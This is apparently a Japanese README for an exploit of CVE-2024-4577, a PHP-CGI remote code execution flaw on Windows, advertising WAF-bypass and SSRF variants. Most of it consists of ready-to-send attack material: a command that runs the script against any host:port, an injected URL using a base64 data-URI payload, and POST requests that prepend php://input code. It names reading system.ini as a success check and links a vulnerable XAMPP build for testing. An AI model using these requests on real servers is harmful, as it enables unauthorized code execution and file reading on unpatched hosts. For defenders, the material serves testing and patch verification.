
Windows上のCVE-2024-4577 PHP-CGI RCEのエクスプロイト。WAFバイパスとSSRFサポート付き。デフォルト、WAF、SSRFシナリオ用の複数のエクスプロイトバリアントを提供します。
cgi.force_redirect + REDIRECT-STATUS。allow_url_include、auto_prepend_file、auto_append_file を必要とせずにRCEが可能。任意のファイルやPHPファイルをインクルードできます。allow_url_include、auto_prepend_file、auto_append_file が出現しません。| 情報 | 内容 |
|---|---|
| 脆弱性名称 | PHP RCE |
| 脆弱性番号 | CVE-2024-4577 |
| リスクレベル | 高 |
| 脆弱性タイプ | RCE |
| 利用難易度 | 低 |
WAFバイパスシナリオ + デフォルトシナリオで使用可能:
python CVE-2024-4577-PHP-RCE.py PhpServerHost:PhpServerPort
例:
python CVE-2024-4577-PHP-RCE.py 123.123.123.123:80
SSRFシナリオ + デフォルトシナリオで使用可能:
http://PhpServerHost:PhpServerPort/php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+-d+allow_url_include%3d1+-d+auto_prepend_file%3d"data:XCANWIN/XCANWIN;base64,PD9waHAgZGllKCJUZSIuInNUIik7Pz4g"
デフォルトシナリオで使用可能:
POST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: PhpServerHost
<?php die("Te"."sT");?>
デフォルトシナリオで使用可能:
POST /php-cgi/php-cgi.exe?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: PhpServerHost
REDIRECT-STATUS: XCANWIN
<?php die("Te"."sT");?>
XAMPP Windows版 8.2.12
https://zenlayer.dl.sourceforge.net/project/xampp/XAMPP%20Windows/8.2.12/xampp-windows-x64-8.2.12-0-VS16-installer.exe?viasf=1
または、こちらから影響を受けるバージョンを選択してください:https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/
変更は不要。デフォルト設定のまま
上記のEXPを使用してテスト
文字列 "TesT" またはサーバーの system.ini ファイルの内容が返されるか確認